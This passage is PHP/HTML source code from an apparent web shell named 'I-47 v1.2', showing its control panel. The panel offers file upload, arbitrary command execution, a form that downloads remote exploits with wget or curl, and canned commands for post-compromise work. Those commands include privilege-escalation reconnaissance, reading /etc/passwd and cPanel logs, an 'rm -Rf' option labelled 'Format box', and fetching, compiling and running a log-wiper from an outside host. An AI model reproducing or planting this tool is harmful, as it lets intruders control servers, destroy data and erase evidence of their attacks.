4321. Upload file : <br><input type="file" name="uploadfile" class="box" size="50"><input type="hidden" name="path" value="<?php echo $dir; ?>" />&nbsp;<input type=submit value="Upload" name="u" value="u" class="but" ></form>
4322. <?php
4323.  
4324. if (is_writable($dir)) {
4325. echo '<font color=lime>&lt; writable &gt;</font>';
4326. } else {
4327. echo '&lt; not writable &gt;';
4328. }
4329. ?>
4330. <br>
4331.  
4332.  
4333.  
4334. </td>
4335. <td align="center" style="height:105px;">Create File :
4336. <form method="post">
4337. <input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile"> <input type="submit" value="Create" name="Create" class="but">
4338. </form>
4339. <?php
4340.  
4341. if (is_writable($dir)) {
4342. echo '<font color=lime>&lt; writable &gt;</font>';
4343. } else {
4344. echo '&lt; not writable &gt;';
4345. }
4346. ?>
4347. </td>
4348. </tr>
4349. <tr>
4350. <td align="center" style="height:105px;">Execute : <form action="<?php echo $self; ?>" method="post">
4351. <input type="hidden" name="executepath" value="<?php echo $dir; ?>" />
4352. <input type="text" class="box" name="execute"> <input type="submit" value="Execute" class="but"></form></td>
4353.  
4354. <td align="center">Create Directory : <form method="post">
4355. <input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder">
4356. <input type="submit" value="Create Directory" name="createdir" class="but">
4357. </form><?php
4358.  
4359. if (is_writable($dir)) {
4360. echo '<font color=lime>&lt; writable &gt;</font>';
4361. } else {
4362. echo '&lt; not writable &gt;';
4363. }
4364. ?></td></tr>
4365. <tr><td style="height:105px;" align="center">Get Exploit&nbsp;<form method="post" actions="<?php echo $self; ?>">
4366. <input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c"><br><br>
4367. <input type="hidden" name="path" value="<?php echo $dir; ?>">
4368. <select name="functiontype" class="sbox">
4369. <option value="wwget">wget</option>
4370. <option value="wlynx">lynx</option>
4371. <option value="wfread">fread</option>
4372. <option value="wfetch">fetch</option>
4373. <option value="wlinks">links</option>
4374. <option value="wget">GET</option>
4375. <option value="wcurl">curl</option>
4376. </select>
4377. <input type="submit" name="uploadurl" value=" G0 " class="but"></form>
4378. </td>
4379. <td align="center">
4380. <form method="post" action="<?php echo $self; ?>">
4381. Some Commands<br>
4382. <?php if($os != "Windows")
4383. { ?>
4384. <SELECT NAME="mycmd" class="box">
4385. <OPTION VALUE="uname -a">Kernel version
4386. <OPTION VALUE="w">Logged in users
4387. <OPTION VALUE="lastlog">Last to connect
4388. <option value='cat /etc/hosts'>IP Addresses
4389. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
4390. <OPTION VALUE="logeraser">Log Eraser
4391. <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
4392. <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
4393. <OPTION VALUE="find / -type f -name \"config*\"">find config* files
4394. <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
4395. <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
4396. <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
4397. <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
4398. <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
4399. <OPTION VALUE="which wget curl w3m lynx">Downloaders?
4400. <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
4401. <OPTION VALUE="ps aux">Show running proccess
4402. <OPTION VALUE="uptime">Uptime check
4403. <OPTION VALUE="cat /proc/meminfo">Memory check
4404. <OPTION VALUE="netstat -an | grep -i listen">Open ports
4405. <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
4406. <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
4407. <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
4408. <OPTION VALUE="./zap2">WIPELOGS PT3
4409. <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
4410. </SELECT>
4411. <?php } else {?>
4412. <SELECT NAME="mycmd" class="box">
4413. <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
4414. <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
4415. <OPTION VALUE="systeminfo">System Informations
4416. <OPTION VALUE="net user">User accounts
4417. <OPTION VALUE="netstat -an">Open ports
4418. <OPTION VALUE="getmac">Get Mac Address
4419. <OPTION VALUE="net start">Show running services
4420. <OPTION VALUE="net view">Show computers
4421. <OPTION VALUE="arp -a">ARP Table
4422. <OPTION VALUE="tasklist">Show Process
4423. <OPTION VALUE="ipconfig/all">IP Configuration
4424. <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
4425. </SELECT>
4426. <?php } ?>
4427. <input type="submit" value="Execute" class="but" name="executecmd">
4428. </form>
4429. </td>
4430. </tr></table><br>
4431.  
4432. </td>
4433. </tr>
4434. </table>
4435. <?php
4436.  
4437.  
4438. //logout
4439.  
4440. if(isset($_GET['logout']))
4441. {
4442. setcookie("hacked",time() - 60*60);
4443. header("Location:$self");
4444. ob_end_flush();
4445. }
4446. ?>
4447.  
4448.  
4449. <hr>
4450. <div align="center">
4451. <font size="6" face="Times New Roman, Times, serif" color="#00CC00">I-47 v1.2 <br>
4452. --==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font color="#FF0000" size="6">&#2332;&#2351; &#2361;&#2367;&#2344;&#2381;&#2342;</font></a></div>
4453. <?php }